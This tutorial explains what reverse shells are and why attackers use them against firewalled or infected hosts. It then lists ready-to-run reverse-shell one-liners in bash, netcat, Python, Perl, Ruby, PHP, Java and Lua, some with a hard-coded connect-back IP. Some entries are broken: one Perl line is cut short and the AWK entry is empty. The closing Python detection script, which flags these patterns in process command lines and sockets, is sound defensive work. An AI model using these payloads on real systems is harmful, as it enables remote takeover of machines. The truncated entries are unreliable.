1. What is a reverse shell?
A reverse shell is one in which the controlling side listens on a TCP or UDP port, the controlled side initiates a connection to that port, and the controlled side's command-line input and output are carried over that connection to the controlling side.
Compare this with ordinary shells such as telnet and SSH: in essence, a reverse shell swaps the client and server roles of the usual network model.
2. Why use a reverse shell?
It is typically used when the controlled side cannot be reached directly because of a firewall, insufficient privileges, a port already being in use, and so on.
For example, suppose we compromise a machine and open a port on it. The attacker then connects from their own machine to the target (target IP:target port). This is the conventional form, which we call a forward (bind) connection; remote desktop, web services, SSH and telnet are all forward connections. When can a forward connection not be used?
There are the following situations:
- The client runs your web trojan, but it sits on a LAN and cannot be connected to directly.
- The target's IP address changes dynamically, so it cannot be controlled continuously.
- Because of a firewall or similar restriction, the target machine can only send requests and cannot accept incoming ones.
- For viruses and Trojans, it is unknown in advance when the victim will be infected, what its network environment is, or when it will be switched on or off; the best strategy is therefore to set up a server and have the malicious program connect out on its own.
With that, the reverse shell is easy to understand: the attacker designates a server, and the victim host actively connects to the attacker's server program. This is called a reverse connection.
3. bash
Listen on a port on the attacking host (port is a port number on the attacking host that is not already in use):
nc -lvvp 1000
On the target host (port is the port number the attacking host is listening on):
bash -i >& /dev/tcp/<attack host ip>/<port> 0>&1
4. nc (netcat)
Listen on a port on the attacking host (port is a port number on the attacking host that is not already in use):
nc -lvvp port
On the target host:
nc -e /bin/bash <attack host ip> <port>
5. Common scripting-language reverse shells
The scripts below are run on the target host, where x.x.x.x is the IP of the attacking host; the attacking host must already be listening on the relevant port. This is not repeated for each entry.
1. python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
2. perl
Method 1:
perl -e 'use Socket;$i="121.5.112.123";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))));'
Method 2:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3. Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("121.5.112.123","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
4. PHP
php -r '$sock=fsockopen("121.5.112.123",5555);exec("/bin/bash -i <&3 >&3 2>&3");'
5. Java
public class Revs {
    /**
     * @param args
     * @throws Exception
     */
    public static void main(String[] args) throws Exception {
        Runtime r = Runtime.getRuntime();
        String cmd[] = {"/bin/bash", "-c", "exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}
6. Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('121.5.112.123','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"
7. AWK
The attacking machine listens. Once the shell comes in, do not press Enter, or the connection is dropped.
awk 'BEGIN'
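Seen from the defender's side, every variant above leaves the same two traces on the target: a command line containing one of a handful of recognisable fragments (/dev/tcp, nc -e, dup2 onto a socket, fsockopen followed by exec, the <&3 >&3 2>&3 redirection), and a shell process whose standard input, output and error resolve to a socket instead of a terminal. The following Python script is an added example, not part of the original page, that encodes both checks as detection logic and runs them over a constructed process snapshot. The ProcessRecord fields, the regexes and the sample processes are all assumptions made for this example; a real collector would fill the records from /proc/<pid>/cmdline, /proc/<pid>/exe and the /proc/<pid>/fd/ links.

```python
import re
from dataclasses import dataclass, field

# Defender-side signatures for the reverse-shell variants listed on this page,
# written as regexes over a process's command line. Host and port are left
# unconstrained so changing the IP or port does not evade the match.
SIGNATURES = {
    "bash_devtcp": re.compile(r"/dev/(tcp|udp)/\S+/\d+"),
    "nc_exec": re.compile(r"\bnc(at)?\b.*\s-e\s*/bin/(ba)?sh"),
    "python_dup2": re.compile(r"socket\.socket\(.*os\.dup2\("),
    "perl_socket": re.compile(r"IO::Socket::INET|use Socket;.*connect\("),
    "ruby_tcpsocket": re.compile(r"TCPSocket\.new\("),
    "php_fsockopen": re.compile(r"fsockopen\(.*(exec|system|popen)\("),
    "lua_socket": re.compile(r"socket\.tcp\(\).*os\.execute\("),
    "fd_redirect_to_socket": re.compile(r"<&\d+\s*>&\d+\s*2>&\d+"),
}

# Interpreters that the page's scripts run under, and the shells they spawn.
INTERPRETERS = ("/php", "/python", "/python3", "/perl", "/ruby", "/lua", "/java")
SHELLS = ("/bash", "/sh", "/dash")


@dataclass
class ProcessRecord:
    """One running process as a collector would read it from /proc (constructed here)."""
    pid: int
    exe: str                                   # resolved /proc/<pid>/exe
    cmdline: str                               # /proc/<pid>/cmdline joined with spaces
    fds: dict = field(default_factory=dict)    # fd number -> /proc/<pid>/fd/<n> link target
    parent_exe: str = ""                       # resolved exe of the parent process


def match_cmdline(cmdline):
    """Names of the page's variants whose signature appears in the command line."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(cmdline))


def stdio_on_socket(fds):
    """True when stdin, stdout and stderr all resolve to a socket: the state
    produced by os.dup2 in the Python variant, by `>& /dev/tcp/...` in bash,
    and by `<&3 >&3 2>&3` in the PHP and Lua variants."""
    return all(fds.get(n, "").startswith("socket:") for n in (0, 1, 2))


def assess(proc):
    """Return a list of human-readable findings for one process (empty if clean)."""
    findings = []
    hits = match_cmdline(proc.cmdline)
    if hits:
        findings.append("cmdline matches: " + ", ".join(hits))
    is_shell = proc.exe.endswith(SHELLS)
    if is_shell and stdio_on_socket(proc.fds):
        findings.append("interactive shell with stdin/stdout/stderr on a socket")
    if is_shell and proc.parent_exe.endswith(INTERPRETERS):
        findings.append("shell spawned by interpreter " + proc.parent_exe)
    return findings


# Constructed sample snapshot; pid 102 is a normal SSH login shell for contrast.
SAMPLE_PROCESSES = [
    ProcessRecord(101, "/usr/bin/bash", "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
                  {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"},
                  "/usr/bin/bash"),
    ProcessRecord(102, "/usr/bin/bash", "-bash",
                  {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"},
                  "/usr/sbin/sshd"),
    ProcessRecord(103, "/usr/bin/sh", "sh -c /bin/bash -i <&3 >&3 2>&3",
                  {0: "/dev/null", 1: "pipe:[4242]", 2: "pipe:[4242]", 3: "socket:[31338]"},
                  "/usr/bin/php"),
]


def run_sample():
    """Assess every process in the constructed snapshot; returns {pid: findings}."""
    return {p.pid: assess(p) for p in SAMPLE_PROCESSES}


if __name__ == "__main__":
    for pid, findings in run_sample().items():
        print(pid, "CLEAN" if not findings else "; ".join(findings))
```

The command-line signatures are cheap but brittle (a base64-wrapped payload would not match), which is why the second check, a shell whose fds 0-2 are sockets, is the one worth wiring into a periodic /proc sweep or an EDR rule: it keys on the effect every variant on this page must produce rather than on the spelling of the command.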